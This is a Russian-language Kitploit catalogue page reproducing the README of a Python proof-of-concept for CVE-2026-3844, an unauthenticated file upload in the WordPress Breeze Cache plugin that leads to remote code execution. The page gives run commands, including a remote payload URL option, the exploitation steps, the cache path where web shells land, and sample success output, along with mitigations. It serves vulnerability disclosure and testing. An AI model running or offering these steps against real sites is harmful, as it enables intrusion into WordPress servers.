Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-3844 — Python proof-of-concept для CVE-2026-3844 — неаутентифицированная произвольная загрузка файлов в плагине WordPress Breeze Cache, позволяющая удалённое выполнение кода. Включает обнаружение, эксплуатацию и проверку веб-шелла. | Kitploit
Инструменты/GitHubGitHub/sahmsec/cve-2026-3844
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubsahmsec/cve-2026-3844

CVE-2026-3844

Python proof-of-concept для CVE-2026-3844 — неаутентифицированная произвольная загрузка файлов в плагине WordPress Breeze Cache, позволяющая удалённое выполнение кода. Включает обнаружение, эксплуатацию и проверку веб-шелла.

Репозиторий
115 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-3844 — WordPress Breeze Cache Неаутентифицированная загрузка файлов

Обзор

Этот репозиторий содержит Python-скрипт proof-of-concept (PoC) для демонстрации уязвимости неаутентифицированной произвольной загрузки файлов, затрагивающей плагин WordPress Breeze Cache <= 2.4.4.

⚠️ Этот проект предназначен строго для авторизованного тестирования безопасности, образовательных исследований и защитной валидации.


Информация об уязвимости

  • CVE ID: CVE-2026-3844
  • Затронутый плагин: Breeze Cache для WordPress
  • Затронутые версии: <= 2.4.4
  • Тип проблемы: Неаутентифицированная произвольная загрузка файлов
  • Воздействие: Потенциальное удалённое выполнение кода (RCE)
  • Вектор атаки: Удалённый / Неаутентифицированный

Уязвимость использует функциональность кэширования граватаров Breeze Cache для сохранения файлов, контролируемых атакующим, в каталоге кэша WordPress.


Возможности

  • Режим обнаружения уязвимости
  • Автоматизированный процесс эксплуатации
  • Поддержка проверки веб-шелла
  • Цветной вывод в терминале
  • Удалённая загрузка полезной нагрузки
  • Проверки загрузки
  • Опциональное ведение журнала вывода

Требования

  • Python 3.8+
  • pycurl
  • termcolor

Установка зависимостей:

pip install pycurl termcolor

Файлы

ФайлОписание
CVE-2026-3844.pyОсновной скрипт эксплойта PoC
CVE-2026-3844.yamlШаблон/конфигурация YAML

Использование

Проверка, уязвима ли цель

python3 CVE-2026-3844.py -u http://target.com --check-only

Запуск эксплойта

python3 CVE-2026-3844.py -u http://target.com

Пользовательская полезная нагрузка

python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php

Сохранение результатов

python3 CVE-2026-3844.py -u http://target.com -o results.txt

Как это работает

Скрипт выполняет следующие шаги:

  1. Определяет установленную версию Breeze Cache
  2. Проверяет, уязвима ли версия плагина
  3. Отправляет специально сформированный запрос комментария WordPress
  4. Использует обработку граватаров кэша Breeze
  5. Ожидает генерации кэша
  6. Проверяет, стал ли загруженный файл доступным
  7. Тестирует отклик полезной нагрузки

Уязвимый путь

Загруженная полезная нагрузка может стать доступной по адресу:

/wp-content/cache/breeze-extra/gravatars/

Примечания

Успешная эксплуатация может зависеть от включённой следующей настройки Breeze:

Host Files Locally - Gravatars

Если функция отключена, попытки эксплуатации могут завершиться неудачей.


Пример вывода

[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!

Отказ от ответственности

Этот репозиторий предоставлен для:

  • Исследований в области безопасности
  • Образовательных целей
  • Авторизованного тестирования на проникновение
  • Оценок защитной безопасности

Не используйте этот проект против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.

Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим проектом.


Рекомендации по смягчению последствий

Администраторам веб-сайтов следует:

  • Обновить Breeze Cache до последней исправленной версии
  • Отключить ненужные функции кэширования файлов
  • Ограничить опасные загрузки файлов
  • Отключить выполнение PHP в каталогах кэша
  • Отслеживать /wp-content/cache/ на предмет подозрительных файлов
  • Развернуть межсетевой экран веб-приложений (WAF)
  • Обеспечить строгую серверную валидацию

Заявление об образовательной цели

Этот proof-of-concept был создан, чтобы помочь:

  • Исследователям в области безопасности
  • Специалистам по тестированию на проникновение
  • Голубым командам
  • Администраторам WordPress
  • Разработчикам

понять риски безопасности, связанные с небезопасными механизмами кэширования и произвольной загрузкой файлов.


Ссылки

  • База данных CVE
  • Рекомендации по безопасности WordPress
  • Рекомендации OWASP по безопасности загрузки файлов
  • Документация плагина Breeze Cache

Автор

Исследование безопасности / Образовательный проект

Скачать инструмент